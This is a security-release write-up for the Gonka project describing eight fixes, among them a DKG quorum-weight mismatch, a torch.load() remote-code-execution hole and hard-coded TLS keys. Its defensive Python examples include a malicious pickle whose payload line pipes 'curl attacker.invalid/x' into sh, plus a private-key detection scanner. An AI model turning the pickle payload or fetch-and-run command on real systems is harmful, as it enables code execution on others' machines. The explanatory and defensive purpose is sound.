Eight Fixes, One Coordinated Push
Between March 6 and March 12, the Gonka development team shipped eight security fixes in a concentrated hardening effort. The fixes span BLS cryptography, consensus logic, ML pipeline safety, and TLS configuration — addressing findings from the ongoing CertiK audit alongside internally discovered issues.
BLS Cryptography Fixes
Two related fixes land in the BLS (Boneh-Lynn-Shacham) signature scheme that backs Gonka's Distributed Key Generation (DKG):
Group key validation fallback removed (#848, #851). When previous-epoch data was unavailable, the validation logic fell back to self-validation, so a node could effectively confirm its own keys: a fail-open path. The fix removes the fallback entirely; cross-validation is required in all cases, and a node that has no previous-epoch data to validate against is no longer trusted by default.
DKG dealer consensus weight mismatch (#849, #852). Dealer consensus counted participant votes unweighted (one vote per participant), while the quorum threshold was computed from slot weights. Because the two sides of the comparison were in different units, consensus could in principle be reached by a set of participants holding less stake than the threshold was meant to require. The fix puts both sides in slot-weighted units.
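To make the mismatch concrete, here is an added example (not Gonka's code) that puts a head-count quorum check beside a slot-weighted one and runs both over a constructed participant set. The 2/3 threshold, the Participant type and the weights are assumptions for illustration; the page does not show the pre-fix arithmetic, and this models only the effect the text describes.

```python
"""Head-count quorum vs slot-weighted quorum for a DKG dealer round.

Added example: a simplified model, not Gonka's code. The 2/3 threshold,
the Participant type and the weights below are assumptions for illustration.
"""
from dataclasses import dataclass

QUORUM_NUM, QUORUM_DEN = 2, 3  # assumed BFT threshold: strictly more than 2/3


@dataclass(frozen=True)
class Participant:
    id: str
    weight: int  # slot weight, assumed proportional to stake


def exceeds_threshold(part: int, total: int) -> bool:
    """True when part/total > QUORUM_NUM/QUORUM_DEN, in exact integer arithmetic."""
    return part * QUORUM_DEN > total * QUORUM_NUM


def headcount_quorum(participants, voters) -> bool:
    """Pre-fix shape of the check: every vote counts once, regardless of weight."""
    yes = sum(1 for p in participants if p.id in voters)
    return exceeds_threshold(yes, len(participants))


def weighted_quorum(participants, voters) -> bool:
    """Fixed shape: votes and threshold are both measured in slot weight."""
    total = sum(p.weight for p in participants)
    yes = sum(p.weight for p in participants if p.id in voters)
    return exceeds_threshold(yes, total)


def voted_stake_fraction(participants, voters) -> float:
    """Share of total slot weight held by the voters."""
    total = sum(p.weight for p in participants)
    return sum(p.weight for p in participants if p.id in voters) / total


# Constructed scenario: six light participants (weight 1 each) and one heavy
# participant holding most of the slots. The light six vote; the heavy one does not.
PARTICIPANTS = [Participant(f"light-{i}", 1) for i in range(6)] + [Participant("heavy", 40)]
LIGHT_VOTERS = {p.id for p in PARTICIPANTS if p.id != "heavy"}


def compare(participants=PARTICIPANTS, voters=LIGHT_VOTERS) -> dict:
    """Evaluate both checks on the same vote set."""
    return {
        "headcount": headcount_quorum(participants, voters),
        "weighted": weighted_quorum(participants, voters),
        "stake_fraction": voted_stake_fraction(participants, voters),
    }


if __name__ == "__main__":
    r = compare()
    print(f"head-count quorum: {r['headcount']}, weighted quorum: {r['weighted']}, "
          f"voting stake: {r['stake_fraction']:.1%}")
```

With the light six voting, the head-count check passes (6 of 7) while the weighted check fails, because those six hold about 13% of the slot weight. The same arithmetic is what makes splitting stake across many identities useless once votes are weighted: more identities raise the head count but not the weight.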
CertiK Audit Findings
CSA-2026-001 (Tachyon vulnerability) (#652, #675). This CometBFT vulnerability, disclosed through CertiK’s audit, was patched by upgrading to CometBFT v0.38.21. The fix was coordinated with the broader Cosmos ecosystem response.
BLS audit fixes (#822). A batch of BLS-related corrections based directly on CertiK’s audit findings, covering edge cases in key generation and validation flows.
ML Pipeline Security
Remote Code Execution via torch.load() (#863). The training pipeline called torch.load() without safety restrictions. torch.load() deserializes with pickle, and a pickle stream can name arbitrary Python callables to run during loading, so a crafted model file executes attacker code on the host that loads it. The fix applies safe deserialization practices; for torch.load() that means treating model files as untrusted input and refusing to reconstruct arbitrary objects (PyTorch's weights_only mode), not merely trusting where the file came from.
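As an added example, not code from the Gonka repository, the following uses only the standard library (no torch) to show the primitive behind this finding: torch.load() hands the object graph to pickle, and pickle will call whatever global a file names. run_command is a constructed stand-in for os.system so the demonstration is deterministic, and the restricted unpickler plays the role that PyTorch's weights_only mode plays for real checkpoints.

```python
"""Arbitrary code execution through pickle-based model loading, and a
restricted unpickler that refuses it.

Added example using the standard library only; torch is not imported.
torch.load() delegates the object graph to pickle, so the primitive shown
here is the one the fix addresses. run_command is a constructed stand-in
for os.system so the demo stays deterministic.
"""
import io
import pickle
from collections import OrderedDict

CALLS = []  # records what an attacker-controlled "model file" made us run


def run_command(cmd: str) -> str:
    """Stand-in for os.system: a real payload would reference os.system directly."""
    CALLS.append(cmd)
    return cmd


class MaliciousCheckpoint:
    """Any object with __reduce__ can name a callable and its arguments;
    pickle invokes that callable while loading, before returning anything."""

    def __reduce__(self):
        return (run_command, ("curl attacker.invalid/x | sh",))


def build_malicious_checkpoint() -> bytes:
    return pickle.dumps(MaliciousCheckpoint())


def build_benign_checkpoint() -> bytes:
    # Constructed stand-in for a state_dict: containers and numbers only.
    return pickle.dumps(OrderedDict(weight=[0.1, -0.2], bias=[0.0]))


def unsafe_load(data: bytes):
    """Plain pickle.loads: mirrors torch.load without weights_only restrictions."""
    return pickle.loads(data)


class RestrictedUnpickler(pickle.Unpickler):
    """Allowlist of globals the loader may resolve. PyTorch's weights_only mode
    applies the same idea with an allowlist of tensor and storage types."""

    ALLOWED = {("collections", "OrderedDict")}

    def find_class(self, module, name):
        if (module, name) in self.ALLOWED:
            return super().find_class(module, name)
        raise pickle.UnpicklingError(f"refusing to resolve {module}.{name}")


def safe_load(data: bytes):
    return RestrictedUnpickler(io.BytesIO(data)).load()


def safe_load_rejects(data: bytes) -> bool:
    """True when the restricted loader refuses the file without running anything."""
    before = len(CALLS)
    try:
        safe_load(data)
    except pickle.UnpicklingError:
        return len(CALLS) == before
    return False


if __name__ == "__main__":
    print("unsafe load returned:", unsafe_load(build_malicious_checkpoint()), "ran:", CALLS)
    print("restricted loader rejects malicious:", safe_load_rejects(build_malicious_checkpoint()))
    print("restricted loader accepts benign:", dict(safe_load(build_benign_checkpoint())))
```

Loading the malicious file with plain pickle runs the payload before anything is returned; the restricted loader raises on the first disallowed global and runs nothing. PyTorch 2.6 made weights_only=True the default, but code that passes weights_only=False, or runs on older versions, is still exposed, and an allowlist is a mitigation rather than a proof of safety. Formats such as safetensors avoid the problem by not embedding code at all.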
Hard-coded TLS credentials (#865). The Gloo transport layer in the training manager used dummy TLS certificates baked into the codebase. Anything committed to a repository is effectively public, so a baked-in key pair authenticates nobody: whoever holds the repository holds the private key and can present the same identity, leaving TLS to encrypt but not authenticate. These were replaced with properly generated credentials.
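A check a practitioner would want after this kind of finding: scan the tree for PEM private-key blocks so a dummy key cannot be committed again. This is an added example, not Gonka's tooling; the files are constructed in memory (scan_tree takes a path-to-content mapping) so it runs offline, and a real run would walk the checkout with os.walk and feed file contents to scan_text.

```python
"""Detect private keys committed to a source tree.

Added example, not part of the Gonka codebase. The sample files are
constructed in memory so the scan runs offline; a real run would walk a
checkout with os.walk and pass each file's text to scan_text.
"""
import re

# PEM header for the private-key types seen in practice (PKCS#1 RSA, EC, DSA,
# PKCS#8 plain or encrypted, OpenSSH).
PEM_PRIVATE_KEY = re.compile(
    r"-----BEGIN (?P<kind>(?:RSA |EC |DSA |ENCRYPTED |OPENSSH )?PRIVATE KEY)-----"
)


def scan_text(path: str, text: str) -> list[dict]:
    """Return one finding per private-key header in the file's text."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), start=1):
        m = PEM_PRIVATE_KEY.search(line)
        if m:
            kind = m.group("kind")
            findings.append({
                "path": path,
                "line": lineno,
                "kind": kind,
                # An encrypted key is still a finding: the passphrase is usually nearby.
                "encrypted": kind.startswith("ENCRYPTED"),
            })
    return findings


def scan_tree(files: dict[str, str]) -> list[dict]:
    """Scan a mapping of path -> file content; returns all findings."""
    out = []
    for path, text in files.items():
        out.extend(scan_text(path, text))
    return out


# Constructed sample tree: a Go source file with an embedded dummy key pair,
# a committed .key file, and two clean files. Key bodies are placeholders.
SAMPLE_TREE = {
    "training/gloo_tls.go": (
        "package training\n\n"
        "const dummyKey = `-----BEGIN RSA PRIVATE KEY-----\n"
        "MIIEpAIBAAKCAQEA...placeholder...\n"
        "-----END RSA PRIVATE KEY-----`\n"
    ),
    "deploy/dummy.key": (
        "-----BEGIN EC PRIVATE KEY-----\n"
        "MHcCAQEEI...placeholder...\n"
        "-----END EC PRIVATE KEY-----\n"
    ),
    "deploy/config.yaml": (
        "tls:\n"
        "  cert_file: /run/secrets/tls.crt\n"
        "  key_file: /run/secrets/tls.key\n"
    ),
    "docs/README.md": "TLS material is provisioned at deploy time; never commit it.\n",
}


if __name__ == "__main__":
    for f in scan_tree(SAMPLE_TREE):
        print(f"{f['path']}:{f['line']}: {f['kind']}"
              + (" (encrypted)" if f["encrypted"] else ""))
```

The scan is deliberately header-based: it fires on any PEM private-key block, including one pasted into documentation, so hits need a short triage step, but it never misses a real key because of an unusual file name or extension. The clean config above shows the intended pattern, paths to secrets mounted at deploy time rather than the secrets themselves.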
Concurrency and Stability
Data race conditions (#543). Multiple race conditions across various components were identified and resolved, improving stability under concurrent load.
Impact
All eight fixes are included in the upcoming v0.2.11 release. None required emergency patches — the team identified and resolved them proactively through audit review and internal testing.